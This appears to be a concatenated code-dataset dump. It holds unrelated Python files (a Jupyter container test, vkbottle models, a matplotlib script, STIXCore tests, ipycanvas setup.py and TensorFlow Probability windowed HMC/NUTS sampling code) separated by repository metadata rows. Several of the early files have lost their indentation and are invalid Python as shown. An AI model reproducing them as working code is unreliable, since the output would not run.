(["JUPYTER_ENABLE_LAB=yes"], "lab"),
(None, "notebook"),
],
)
def test_start_notebook(container, http_client, env, expected_server):
"""Test the notebook start-notebook script"""
LOGGER.info(
f"Test that the start-notebook launches the {expected_server} server from the env {env} ..."
)
c = container.run(
tty=True,
environment=env,
command=["start-notebook.sh"],
)
resp = http_client.get("http://localhost:8888")
logs = c.logs(stdout=True).decode("utf-8")
LOGGER.debug(logs)
assert resp.status_code == 200, "Server is not listening"
assert (
f"Executing the command: jupyter {expected_server}" in logs
), f"Not the expected command (jupyter {expected_server}) was launched"
# Checking warning messages
if not env:
msg = "WARN: Jupyter Notebook deprecation notice"
assert msg in logs, f"Expected warning message {msg} not printed"
def test_tini_entrypoint(container, pid=1, command="tini"):
"""Check that tini is launched as PID 1
Credits to the following answer for the ps options used in the test:
https://superuser.com/questions/632979/if-i-know-the-pid-number-of-a-process-how-can-i-get-its-name
"""
LOGGER.info(f"Test that {command} is launched as PID {pid} ...")
c = container.run(
tty=True,
command=["start.sh"],
)
# Select the PID 1 and get the corresponding command
cmd = c.exec_run(f"ps -p {pid} -o comm=")
output = cmd.output.decode("utf-8").strip("\n")
assert output == command, f"{command} shall be launched as pid {pid}, got {output}"
| 35.245283
| 103
| 0.661135
|
bbada056f120650b95f83a96a363e343ba3c95c5
| 598
|
py
|
Python
|
vkbottle/types/responses/likes.py
|
LouisPython217/vkbottle
|
3541bbdb66f32c2d3567b0047c36b706ac72bb3b
|
[
"MIT"
] | null | null | null |
vkbottle/types/responses/likes.py
|
LouisPython217/vkbottle
|
3541bbdb66f32c2d3567b0047c36b706ac72bb3b
|
[
"MIT"
] | null | null | null |
vkbottle/types/responses/likes.py
|
LouisPython217/vkbottle
|
3541bbdb66f32c2d3567b0047c36b706ac72bb3b
|
[
"MIT"
] | null | null | null |
import typing
from ..base import BaseModel
from vkbottle.types import objects
class IsLiked(BaseModel):
liked: objects.base.BoolInt = None
copied: objects.base.BoolInt = None
class IsLikedModel(BaseModel):
response: IsLiked = None
class Add(BaseModel):
likes: int = None
class AddModel(BaseModel):
response: Add = None
class Delete(BaseModel):
likes: int = None
class DeleteModel(BaseModel):
response: Delete = None
class GetList(BaseModel):
count: int = None
items: typing.List = None
class GetListModel(BaseModel):
response: GetList = None
| 15.736842
| 39
| 0.70903
|
c3bf0bcc6f6f35546a710791915729a195351401
| 386
|
py
|
Python
|
intermediates-python/1. Matplotlib/script_8.py
|
nhutnamhcmus/datacamp-playground
|
25457e813b1145e1d335562286715eeddd1c1a7b
|
[
"MIT"
] | 1
|
2021-05-08T11:09:27.000Z
|
2021-05-08T11:09:27.000Z
|
intermediates-python/1. Matplotlib/script_8.py
|
nhutnamhcmus/datacamp-playground
|
25457e813b1145e1d335562286715eeddd1c1a7b
|
[
"MIT"
] | 1
|
2022-03-12T15:42:14.000Z
|
2022-03-12T15:42:14.000Z
|
intermediates-python/1. Matplotlib/script_8.py
|
nhutnamhcmus/datacamp-playground
|
25457e813b1145e1d335562286715eeddd1c1a7b
|
[
"MIT"
] | 1
|
2021-04-30T18:24:19.000Z
|
2021-04-30T18:24:19.000Z
|
import matplotlib.pyplot as plt
# Basic scatter plot, log scale
plt.scatter(gdp_cap, life_exp)
plt.xscale('log')
# Strings
xlab = 'GDP per Capita [in USD]'
ylab = 'Life Expectancy [in years]'
title = 'World Development in 2007'
# Add axis labels
plt.xlabel(xlab)
plt.ylabel(ylab)
# Add title
plt.title(title)
# After customizing, display the plot
plt.show()
| 17.545455
| 38
| 0.686528
|
759cc8130e60f8dcf6b86e3fe6e882374db0f382
| 399
|
py
|
Python
|
hrwros_ws/build/hrwros_week3/catkin_generated/pkg.develspace.context.pc.py
|
AshfakYeafi/ros
|
7895302251088b7945e359f60a9c617e5170a72e
|
[
"MIT"
] | null | null | null |
hrwros_ws/build/hrwros_week3/catkin_generated/pkg.develspace.context.pc.py
|
AshfakYeafi/ros
|
7895302251088b7945e359f60a9c617e5170a72e
|
[
"MIT"
] | null | null | null |
hrwros_ws/build/hrwros_week3/catkin_generated/pkg.develspace.context.pc.py
|
AshfakYeafi/ros
|
7895302251088b7945e359f60a9c617e5170a72e
|
[
"MIT"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "hrwros_week3"
PROJECT_SPACE_DIR = "/home/venom/ros/hrwros_ws/devel/.private/hrwros_week3"
PROJECT_VERSION = "0.1.0"
| 44.333333
| 75
| 0.714286
|
ced59456e3d203a6b9aca6da83f1faeb930bef43
| 239
|
py
|
Python
|
torrentscraper/datastruct/tvcalendar_instance.py
|
AsiganTheSunk/python-torrent-scrapper
|
30f27962e795840b82d47398e05664429829ff2b
|
[
"Apache-2.0"
] | 5
|
2018-05-19T06:18:01.000Z
|
2020-01-14T23:17:30.000Z
|
torrentscraper/datastruct/tvcalendar_instance.py
|
AsiganTheSunk/python-torrent-scrapper
|
30f27962e795840b82d47398e05664429829ff2b
|
[
"Apache-2.0"
] | 9
|
2018-05-24T01:02:46.000Z
|
2020-02-13T22:35:43.000Z
|
torrentscraper/datastruct/tvcalendar_instance.py
|
AsiganTheSunk/python-torrent-scrapper
|
30f27962e795840b82d47398e05664429829ff2b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
class TVCalendarInstance():
def __init__(self, main_month_uri):
self.main_month_uri = main_month_uri
self.next_month_uri = ''
self.previous_month_uri = ''
self.main_calendar = {}
| 26.555556
| 44
| 0.656904
|
48ef51c315db4f4c97e0a147edb1579d40e48011
| 2,493
|
py
|
Python
|
stixcore/products/tests/test_quicklook.py
|
samaloney/STIXCore
|
ad9526cc37701aabcbe64bea249cb77d2313e5c6
|
[
"BSD-3-Clause"
] | 1
|
2021-07-15T14:57:25.000Z
|
2021-07-15T14:57:25.000Z
|
stixcore/products/tests/test_quicklook.py
|
samaloney/STIXCore
|
ad9526cc37701aabcbe64bea249cb77d2313e5c6
|
[
"BSD-3-Clause"
] | null | null | null |
stixcore/products/tests/test_quicklook.py
|
samaloney/STIXCore
|
ad9526cc37701aabcbe64bea249cb77d2313e5c6
|
[
"BSD-3-Clause"
] | null | null | null |
import re
from unittest.mock import patch
import pytest
from stixcore.data.test import test_data
from stixcore.products.level0 import quicklook as qll0
from stixcore.products.level1 import quicklook as qll1
testpackets = [(test_data.tmtc.TM_21_6_30, qll0.LightCurve, 'ql-lightcurve',
'0659402030f00007', '0659402958f00007', 232),
(test_data.tmtc.TM_21_6_31, qll0.Background, 'ql-background',
'0659399870f00253', '0659402958f00253', 386),
(test_data.tmtc.TM_21_6_32, qll0.Spectra, 'ql-spectra',
'0659399434f00007', '0659402538f00007', 4),
(test_data.tmtc.TM_21_6_33, qll0.Variance, 'ql-variance',
'0659399970f00007', '0659402958f00007', 747),
(test_data.tmtc.TM_21_6_34, qll0.FlareFlag, 'ql-flareflag',
'0659400170f00007', '0659402958f00007', 697),
(test_data.tmtc.TM_21_6_41_complete, qll0.EnergyCalibration, 'ql-energycalibration',
'0659318520f00000', '0659326920f00000', 1)
]
@patch('stixcore.products.levelb.binary.LevelB')
@pytest.mark.parametrize('packets', testpackets, ids=[f[0].stem for f in testpackets])
def test_quicklook(levelb, packets):
hex_file, cl, name, beg, end, size = packets
with hex_file.open('r') as file:
hex = file.readlines()
levelb.data.__getitem__.return_value = [re.sub(r"\s+", "", h) for h in hex]
ql = cl.from_levelb(levelb)
assert ql.level == 'L0'
assert ql.name == name
assert str(ql.obs_beg) == beg
# TODO enable time tests again
# assert str(ql.obs_end) == end
assert len(ql.data) == size
@patch('stixcore.products.levelb.binary.LevelB')
def test_lightcurve(levelb):
hex_file = test_data.tmtc.TM_21_6_30
with hex_file.open('r') as file:
hex = file.read()
levelb.data.__getitem__.return_value = [re.sub(r"\s+", "", hex)]
ql_lc_product_l0 = qll0.LightCurve.from_levelb(levelb)
assert ql_lc_product_l0.level == 'L0'
assert ql_lc_product_l0.name == 'ql-lightcurve'
assert len(ql_lc_product_l0.control) == 1
assert len(ql_lc_product_l0.data) == ql_lc_product_l0.control['num_samples']
ql_lc_product_l1 = qll1.LightCurve.from_level0(ql_lc_product_l0)
assert ql_lc_product_l1.level == 'L1'
assert ql_lc_product_l1.name == 'ql-lightcurve'
assert len(ql_lc_product_l1.control) == 1
assert len(ql_lc_product_l1.data) == ql_lc_product_l1.control['num_samples']
| 38.953125
| 99
| 0.677898
|
cdcdfe7f0f57635d696981e037d59b9857ff2a84
| 2,620
|
py
|
Python
|
setup.py
|
AyrtonB/ipycanvas
|
96064b7dbd86e71d47146033573c372224c14162
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
AyrtonB/ipycanvas
|
96064b7dbd86e71d47146033573c372224c14162
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
AyrtonB/ipycanvas
|
96064b7dbd86e71d47146033573c372224c14162
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
from glob import glob
from os.path import join as pjoin
from os import path
from jupyter_packaging import (
create_cmdclass, install_npm, ensure_targets,
combine_commands, ensure_python,
get_version
)
from setuptools import setup, find_packages
HERE = path.dirname(path.abspath(__file__))
# The name of the project
name = 'ipycanvas'
# Ensure a valid python version
ensure_python('>=3.5')
# Get our version
version = get_version(pjoin(name, '_version.py'))
nb_path = pjoin(HERE, name, 'nbextension', 'static')
lab_path = pjoin(HERE, name, 'labextension')
# Representative files that should exist after a successful build
jstargets = [
pjoin(nb_path, 'index.js'),
pjoin(HERE, 'lib', 'plugin.js'),
]
package_data_spec = {
name: [
'nbextension/static/*.*js*',
'labextension/**'
]
}
data_files_spec = [
('share/jupyter/nbextensions/ipycanvas',
nb_path, '*.js*'),
('share/jupyter/labextensions/ipycanvas', lab_path, '**'),
('etc/jupyter/nbconfig/notebook.d' , HERE, 'ipycanvas.json')
]
cmdclass = create_cmdclass('jsdeps', package_data_spec=package_data_spec,
data_files_spec=data_files_spec)
cmdclass['jsdeps'] = combine_commands(
install_npm(HERE, build_cmd='build'),
ensure_targets(jstargets),
)
setup_args = dict(
name=name,
description='Interactive widgets library exposing the browser\'s Canvas API',
version=version,
scripts=glob(pjoin('scripts', '*')),
cmdclass=cmdclass,
packages=find_packages(),
author='Martin Renou',
author_email='martin.renou@gmail.com',
url='https://github.com/martinRenou/ipycanvas',
license='BSD',
platforms="Linux, Mac OS X, Windows",
keywords=['Jupyter', 'Widgets', 'IPython'],
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Framework :: Jupyter',
],
include_package_data = True,
install_requires = [
'ipywidgets>=7.6.0',
'pillow>=6.0',
'numpy',
'orjson'
],
extras_require = {},
entry_points = {
},
)
if __name__ == '__main__':
setup(**setup_args)
| 25.436893
| 81
| 0.659924
|
45b757f433ba659a4aef86c5df6ca3ec29726681
| 40,203
|
py
|
Python
|
tensorflow_probability/python/experimental/mcmc/windowed_sampling.py
|
axch/probability
|
b112faafc593d18e6adf4c85fa8e0ce37b29f400
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/experimental/mcmc/windowed_sampling.py
|
axch/probability
|
b112faafc593d18e6adf4c85fa8e0ce37b29f400
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/experimental/mcmc/windowed_sampling.py
|
axch/probability
|
b112faafc593d18e6adf4c85fa8e0ce37b29f400
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Windowed adaptation for Markov chain Monte Carlo."""
import collections
import functools
import warnings
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.bijectors import chain
from tensorflow_probability.python.bijectors import invert
from tensorflow_probability.python.bijectors import joint_map
from tensorflow_probability.python.bijectors import reshape
from tensorflow_probability.python.bijectors import restructure
from tensorflow_probability.python.experimental.mcmc import diagonal_mass_matrix_adaptation as dmma
from tensorflow_probability.python.experimental.mcmc import initialization
from tensorflow_probability.python.experimental.mcmc import preconditioned_hmc as phmc
from tensorflow_probability.python.experimental.mcmc import preconditioned_nuts as pnuts
from tensorflow_probability.python.experimental.mcmc import preconditioning_utils
from tensorflow_probability.python.experimental.mcmc import sharded
from tensorflow_probability.python.experimental.stats import sample_stats
from tensorflow_probability.python.internal import nest_util
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensorshape_util
from tensorflow_probability.python.internal import unnest
from tensorflow_probability.python.math import generic as generic_math
from tensorflow_probability.python.mcmc import dual_averaging_step_size_adaptation as dassa
from tensorflow_probability.python.mcmc import kernel as kernel_base
from tensorflow_probability.python.mcmc import sample
from tensorflow_probability.python.mcmc.internal import util as mcmc_util
from tensorflow.python.ops import control_flow_util # pylint: disable=g-direct-tensorflow-import
from tensorflow.python.util import nest # pylint: disable=g-direct-tensorflow-import
__all__ = [
'windowed_adaptive_hmc',
'windowed_adaptive_nuts',
'default_nuts_trace_fn',
'default_hmc_trace_fn',
]
# Cause all warnings to always be triggered.
# Not having this means subsequent calls wont trigger the warning.
warnings.filterwarnings(
'always', module='tensorflow_probability.*windowed_sampling',
append=True) # Don't override user-set filters.
def default_nuts_trace_fn(state, bijector, is_adapting, pkr):
"""Trace function for `windowed_adaptive_nuts` providing standard diagnostics.
Specifically, these match up with a number of diagnostics used by ArviZ [1],
to make diagnostics and analysis easier. The names used follow those used in
TensorFlow Probability, and will need to be mapped to those used in the ArviZ
schema.
References:
[1]: Kumar, R., Carroll, C., Hartikainen, A., & Martin, O. (2019). ArviZ a
unified library for exploratory analysis of Bayesian models in Python.
Journal of Open Source Software, 4(33), 1143.
Args:
state: tf.Tensor
Current sampler state, flattened and unconstrained.
bijector: tfb.Bijector
This can be used to untransform the shape to something with the same shape
as will be returned.
is_adapting: bool
Whether this is an adapting step, or may be treated as a valid MCMC draw.
pkr: UncalibratedPreconditionedHamiltonianMonteCarloKernelResults
Kernel results from this iteration.
Returns:
dict with sampler statistics.
"""
del state, bijector # Unused
energy_diff = unnest.get_innermost(pkr, 'log_accept_ratio')
return {
'step_size': unnest.get_innermost(pkr, 'step_size'),
'tune': is_adapting,
'target_log_prob': unnest.get_innermost(pkr, 'target_log_prob'),
'diverging': unnest.get_innermost(pkr, 'has_divergence'),
'accept_ratio':
tf.minimum(tf.ones_like(energy_diff), tf.exp(energy_diff)),
'variance_scaling':
unnest.get_innermost(pkr, 'momentum_distribution').variance(),
'n_steps': unnest.get_innermost(pkr, 'leapfrogs_taken'),
'is_accepted': unnest.get_innermost(pkr, 'is_accepted')}
def default_hmc_trace_fn(state, bijector, is_adapting, pkr):
"""Trace function for `windowed_adaptive_hmc` providing standard diagnostics.
Specifically, these match up with a number of diagnostics used by ArviZ [1],
to make diagnostics and analysis easier. The names used follow those used in
TensorFlow Probability, and will need to be mapped to those used in the ArviZ
schema.
References:
[1]: Kumar, R., Carroll, C., Hartikainen, A., & Martin, O. (2019). ArviZ a
unified library for exploratory analysis of Bayesian models in Python.
Journal of Open Source Software, 4(33), 1143.
Args:
state: tf.Tensor
Current sampler state, flattened and unconstrained.
bijector: tfb.Bijector
This can be used to untransform the shape to something with the same shape
as will be returned.
is_adapting: bool
Whether this is an adapting step, or may be treated as a valid MCMC draw.
pkr: UncalibratedPreconditionedHamiltonianMonteCarloKernelResults
Kernel results from this iteration.
Returns:
dict with sampler statistics.
"""
del state, bijector # Unused
energy_diff = unnest.get_innermost(pkr, 'log_accept_ratio')
has_divergence = tf.math.abs(energy_diff) > 500.
return {
'step_size': unnest.get_innermost(pkr, 'step_size'),
'tune': is_adapting,
'target_log_prob': unnest.get_innermost(pkr, 'target_log_prob'),
'diverging': has_divergence,
'log_acceptance_correction':
unnest.get_innermost(pkr, 'log_acceptance_correction'),
'accept_ratio':
tf.minimum(tf.ones_like(energy_diff), tf.exp(energy_diff)),
'variance_scaling':
unnest.get_innermost(pkr, 'momentum_distribution').variance(),
'is_accepted': unnest.get_innermost(pkr, 'is_accepted')}
def _get_flat_unconstraining_bijector(jd_model):
"""Create a bijector from a joint distribution that flattens and unconstrains.
The intention is (loosely) to go from a model joint distribution supported on
U_1 x U_2 x ... U_n, with U_j a subset of R^{n_j}
to a model supported on R^N, with N = sum(n_j). (This is "loose" in the sense
of base measures: some distribution may be supported on an m-dimensional
subset of R^n, and the default transform for that distribution may then
have support on R^m. See [1] for details.
Args:
jd_model: subclass of `tfd.JointDistribution` A JointDistribution for a
model.
Returns:
Two `tfb.Bijector`s where the `.forward` method flattens and unconstrains
points, and the second may be used to initialize a step size.
"""
# TODO(b/180396233): This bijector is in general point-dependent.
event_space_bij = jd_model.experimental_default_event_space_bijector()
flat_bijector = restructure.pack_sequence_as(jd_model.event_shape_tensor())
unconstrained_shapes = event_space_bij(
flat_bijector).inverse_event_shape_tensor(jd_model.event_shape_tensor())
# this reshaping is required as as split can produce a tensor of shape [1]
# when the distribution event shape is []
unsplit = joint_map.JointMap(bijectors=[
reshape.Reshape(event_shape_out=x, event_shape_in=[-1])
for x in unconstrained_shapes])
bij = invert.Invert(chain.Chain([event_space_bij, flat_bijector, unsplit]))
step_size_bij = invert.Invert(flat_bijector)
return bij, step_size_bij
def _setup_mcmc(model, n_chains, *, init_position=None, seed=None, **pins):
"""Construct bijector and transforms needed for windowed MCMC.
This pins the initial model, constructs a bijector that unconstrains and
flattens each dimension and adds a leading batch shape of `n_chains`,
initializes a point in the unconstrained space, and constructs a transformed
log probability using the bijector.
Note that we must manually construct this target log probability instead of
using a transformed transition kernel because the TTK assumes the shape
in is the same as the shape out.
Args:
model: `tfd.JointDistribution`
The model to sample from.
n_chains: list of ints
Number of chains (independent examples) to run.
init_position: Optional
Structure of tensors at which to initialize sampling. Should have the
same shape and structure as
`model.experimental_pin(**pins).sample_unpinned(n_chains)`.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
**pins:
Values passed to `model.experimental_pin`.
Returns:
target_log_prob_fn: Callable on the transformed space.
initial_transformed_position: `tf.Tensor`, sampled from a uniform (-2, 2).
bijector: `tfb.Bijector` instance, which unconstrains and flattens.
step_broadcast_fn: Callable to broadcast step size over latent structure.
batch_shape: Batch shape of the model.
shard_axis_names: Shard axis names for the model
"""
pinned_model = model.experimental_pin(**pins) if pins else model
bijector, step_bijector = _get_flat_unconstraining_bijector(pinned_model)
if init_position is None:
raw_init_dist = initialization.init_near_unconstrained_zero(pinned_model)
init_position = initialization.retry_init(
raw_init_dist.sample,
target_fn=pinned_model.unnormalized_log_prob,
sample_shape=n_chains,
seed=seed)
initial_transformed_position = tf.nest.map_structure(
tf.identity, bijector.forward(init_position))
batch_shape = pinned_model.batch_shape
if tf.nest.is_nested(batch_shape):
batch_shape = functools.reduce(tf.broadcast_static_shape,
tf.nest.flatten(batch_shape))
lp_static_shape = tensorshape_util.concatenate(n_chains, batch_shape)
if not tensorshape_util.is_fully_defined(batch_shape):
batch_shape = pinned_model.batch_shape_tensor()
if tf.nest.is_nested(batch_shape):
batch_shape = functools.reduce(tf.broadcast_dynamic_shape,
tf.nest.flatten(batch_shape))
# This tf.function is not redundant with the ones on _fast_window
# and _slow_window because the various kernels (like HMC) may invoke
# `target_log_prob_fn` multiple times within one window.
@tf.function(autograph=False)
def target_log_prob_fn(*args):
lp = pinned_model.unnormalized_log_prob(bijector.inverse(args))
tensorshape_util.set_shape(lp, lp_static_shape)
ldj = bijector.inverse_log_det_jacobian(
args, event_ndims=[1 for _ in initial_transformed_position])
return lp + ldj
def step_broadcast(step_size):
# Only apply the bijector to nested step sizes or non-scalar batches.
if tf.nest.is_nested(step_size):
return step_bijector(
nest_util.broadcast_structure(pinned_model.event_shape_tensor(),
step_size))
else:
return step_size
shard_axis_names = pinned_model.experimental_shard_axis_names
if any(tf.nest.flatten(shard_axis_names)):
shard_axis_names = nest.flatten_up_to(
initial_transformed_position, pinned_model._model_flatten( # pylint: disable=protected-access
shard_axis_names))
else:
# No active shard axis names
shard_axis_names = None
return (target_log_prob_fn,
initial_transformed_position,
bijector,
step_broadcast,
ps.convert_to_shape_tensor(batch_shape, name='batch_shape'),
shard_axis_names)
def _make_base_kernel(*, kind, proposal_kernel_kwargs):
"""Construct internal sampling kernel."""
if kind == 'nuts':
return pnuts.PreconditionedNoUTurnSampler(**proposal_kernel_kwargs)
elif kind == 'hmc':
return phmc.PreconditionedHamiltonianMonteCarlo(**proposal_kernel_kwargs)
else:
raise TypeError(
'`kind` must be "nuts" or "hmc" (got {kind})'.format(kind=kind))
def make_fast_adapt_kernel(*,
kind,
proposal_kernel_kwargs,
dual_averaging_kwargs):
return dassa.DualAveragingStepSizeAdaptation(
_make_base_kernel(
kind=kind, proposal_kernel_kwargs=proposal_kernel_kwargs),
**dual_averaging_kwargs)
def make_slow_adapt_kernel(*,
kind,
proposal_kernel_kwargs,
dual_averaging_kwargs,
initial_running_variance):
return dmma.DiagonalMassMatrixAdaptation(
make_fast_adapt_kernel(
kind=kind,
proposal_kernel_kwargs=proposal_kernel_kwargs,
dual_averaging_kwargs=dual_averaging_kwargs),
initial_running_variance=initial_running_variance,
num_estimation_steps=dual_averaging_kwargs['num_adaptation_steps'])
def _get_window_sizes(num_adaptation_steps):
"""Hardcoded way to get a reasonable scheme.
This assumes we do something proportional to
fast window: 75 steps
slow window: 25 steps
slow window: 50 steps
slow window: 100 steps
slow window: 200 steps
fast window: 50 steps
Which is a total of 500 steps.
Args:
num_adaptation_steps: int Number of adaptation steps to run.
Returns:
The first window size, the initial slow window size, the last window size.
"""
slow_window_size = num_adaptation_steps // 20
first_window_size = 3 * slow_window_size
last_window_size = (num_adaptation_steps -
15 * slow_window_size -
first_window_size)
return first_window_size, slow_window_size, last_window_size
class WindowedAdaptationResults(mcmc_util.PrettyNamedTupleMixin,
collections.namedtuple(
'WindowedAdaptationResults', [
'inner_results',
'step',
])):
"""Results of the WindowedAdaptation TransitionKernel.
Attributes:
inner_results: Results of the inner kernel.
step: Int32 scalar `Tensor`. The current step number as perceived by this
kernel. Increases by 1 for every call to `one_step`.
"""
__slots__ = ()
class WindowedAdaptation(kernel_base.TransitionKernel):
"""A transition kernel to control warmup adaptation.
This assumes we do something proportional to
fast window: 75 steps
slow window: 25 steps
slow window: 50 steps
slow window: 100 steps
slow window: 200 steps
fast window: 50 steps
Which is a total of 500 steps.
We will adapt step size during both fast and slow windows. Mass matrix is
only adapted during the slow windows.
"""
def __init__(self, inner_kernel, num_adaptation_steps, name=None):
"""Initializes this transition kernel.
Args:
inner_kernel: `TransitionKernel`-like object.
num_adaptation_steps: Scalar `int` `Tensor` number of initial steps during
which to adjust the step size and mass matrix. This may be greater, less
than, or equal to the number of burnin steps.
name: Python `str` name prefixed to Ops created by this class. Default:
'windowed_adaptation'.
"""
inner_kernel = mcmc_util.enable_store_parameters_in_results(inner_kernel)
self._parameters = dict(
inner_kernel=inner_kernel,
num_adaptation_steps=num_adaptation_steps,
name=name,
)
@property
def parameters(self):
return self._parameters
@property
def inner_kernel(self):
return self._parameters['inner_kernel']
@property
def num_adaptation_steps(self):
return self._parameters['num_adaptation_steps']
@property
def name(self):
return self._parameters['name']
def one_step(self, current_state, previous_kernel_results, seed=None):
previous_inner_results = previous_kernel_results.inner_results
previous_step = previous_kernel_results.step
num_adaptation_steps = tf.cast(self.num_adaptation_steps, dtype=tf.int32)
first_window_size, slow_window_size, last_window_size = _get_window_sizes(
num_adaptation_steps)
def first_fast_window_update():
dmma_results = previous_inner_results
dassa_results = dmma_results.inner_results._replace(
num_adaptation_steps=first_window_size + slow_window_size)
return dmma_results._replace(
inner_results=dassa_results,
# Skip mass matrix adaptation.
num_estimation_steps=tf.constant(-1, dtype=tf.int32))
def first_slow_window_update():
dmma_results = previous_inner_results
# Start mass matrix adaptation.
return dmma_results._replace(
step=tf.constant(0, dtype=tf.int32),
num_estimation_steps=slow_window_size)
def slow_window_update():
curr_slow_window_size = (
previous_step - first_window_size + slow_window_size)
# Reset mass matrix adaptation.
dmma_results = self.inner_kernel._bootstrap_from_inner_results( # pylint: disable=protected-access
current_state, previous_inner_results.inner_results)
# Reset step size adaptation.
dassa_inner_results = self.inner_kernel.inner_kernel.step_size_setter_fn(
dmma_results.inner_results.inner_results,
dmma_results.inner_results.new_step_size)
dassa_results = self.inner_kernel.inner_kernel._bootstrap_from_inner_results( # pylint: disable=protected-access
current_state, dassa_inner_results)
dassa_results = dassa_results._replace(
num_adaptation_steps=curr_slow_window_size)
return dmma_results._replace(
inner_results=dassa_results,
num_estimation_steps=curr_slow_window_size)
def last_window_update():
dmma_results = previous_inner_results
# Reset step size adaptation.
dassa_inner_results = self.inner_kernel.inner_kernel.step_size_setter_fn(
dmma_results.inner_results.inner_results,
dmma_results.inner_results.new_step_size)
dassa_results = self.inner_kernel.inner_kernel._bootstrap_from_inner_results( # pylint: disable=protected-access
current_state, dassa_inner_results)
dassa_results = dassa_results._replace(
num_adaptation_steps=last_window_size)
return dmma_results._replace(inner_results=dassa_results)
is_first_fast_window_start = tf.equal(previous_step,
tf.constant(0, dtype=tf.int32))
is_first_slow_window_start = tf.equal(previous_step, first_window_size)
# Currently, we use 4 slow windows in the function _get_window_sizes.
num_slow_windows = 4
is_slow_window_start = tf.reduce_any(
tf.equal(
previous_step, first_window_size + slow_window_size * tf.constant(
[2**i - 1
for i in range(1, num_slow_windows)], dtype=tf.int32)))
is_last_window_start = tf.equal(
previous_step,
first_window_size + (2**num_slow_windows - 1) * slow_window_size)
option = (
tf.cast(is_first_fast_window_start, dtype=tf.int32) +
tf.cast(is_first_slow_window_start, dtype=tf.int32) * 2 +
tf.cast(is_slow_window_start, dtype=tf.int32) * 3 +
tf.cast(is_last_window_start, dtype=tf.int32) * 4)
previous_inner_results = mcmc_util.choose_from(option, [
previous_inner_results,
first_fast_window_update(),
first_slow_window_update(),
slow_window_update(),
last_window_update()
])
new_state, new_inner_results = self.inner_kernel.one_step(
current_state, previous_inner_results, seed=seed)
return new_state, previous_kernel_results._replace(
inner_results=new_inner_results, step=previous_step + 1)
def bootstrap_results(self, init_state):
return WindowedAdaptationResults(
inner_results=self.inner_kernel.bootstrap_results(init_state),
step=tf.constant(0, dtype=tf.int32))
@property
def is_calibrated(self):
return self.inner_kernel.is_calibrated
def experimental_with_shard_axes(self, shard_axis_names):
return self.copy(
inner_kernel=self.inner_kernel.experimental_with_shard_axes(
shard_axis_names))
@property
def experimental_shard_axis_names(self):
return self.inner_kernel.experimental_shard_axis_names
def make_windowed_adapt_kernel(*, kind, proposal_kernel_kwargs,
dual_averaging_kwargs, initial_running_variance,
chain_axis_names, shard_axis_names):
"""Constructs a windowed adaptation kernel."""
kernel = WindowedAdaptation(
make_slow_adapt_kernel(
kind=kind,
proposal_kernel_kwargs=proposal_kernel_kwargs,
dual_averaging_kwargs=dual_averaging_kwargs,
initial_running_variance=initial_running_variance),
num_adaptation_steps=dual_averaging_kwargs['num_adaptation_steps'])
if chain_axis_names:
kernel = sharded.Sharded(kernel, chain_axis_names)
if shard_axis_names:
kernel = kernel.experimental_with_shard_axes(shard_axis_names)
return kernel
def _do_sampling(*, kind, proposal_kernel_kwargs, dual_averaging_kwargs,
num_draws, num_burnin_steps, initial_position,
initial_running_variance, trace_fn, bijector,
return_final_kernel_results, seed,
chain_axis_names, shard_axis_names):
"""Sample from base HMC kernel."""
kernel = make_windowed_adapt_kernel(
kind=kind,
proposal_kernel_kwargs=proposal_kernel_kwargs,
dual_averaging_kwargs=dual_averaging_kwargs,
initial_running_variance=initial_running_variance,
chain_axis_names=chain_axis_names,
shard_axis_names=shard_axis_names)
return sample.sample_chain(
num_draws,
initial_position,
kernel=kernel,
num_burnin_steps=num_burnin_steps,
# pylint: disable=g-long-lambda
trace_fn=lambda state, pkr: trace_fn(
state, bijector, pkr.step <= dual_averaging_kwargs[
'num_adaptation_steps'], pkr.inner_results.inner_results.
inner_results),
# pylint: enable=g-long-lambda
return_final_kernel_results=return_final_kernel_results,
seed=seed)
def _get_step_size(initial_transformed_position, log_prob_fn):
"""Heuristic for initializing step size.
If we (over) optimistically assume good scaling, 1 / sum(event_dims)**0.25
will be near the optimal step size. We further scale that downwards. See
Langmore, Ian, Michael Dikovsky, Scott Geraedts, Peter Norgaard, and Rob Von
Behren. 2019. “A Condition Number for Hamiltonian Monte Carlo.” arXiv
[stat.CO]. arXiv. http://arxiv.org/abs/1905.09813.
Args:
initial_transformed_position: Iterable of arguments to log_prob_fn, in order
to get a dtype and find a heuristic for an initial step size. We assume
the Tensor has been flattened so that number of event dimensions is the
last one.
log_prob_fn: Target log probability function.
Returns:
Scalar float of the same dtype as log_prob_fn.
"""
# TODO(b/187658871): Update this code after internal kernels can support it.
dtype = log_prob_fn(*initial_transformed_position).dtype
return 0.5 * sum([
tf.cast(ps.shape(state_part)[-1], dtype)
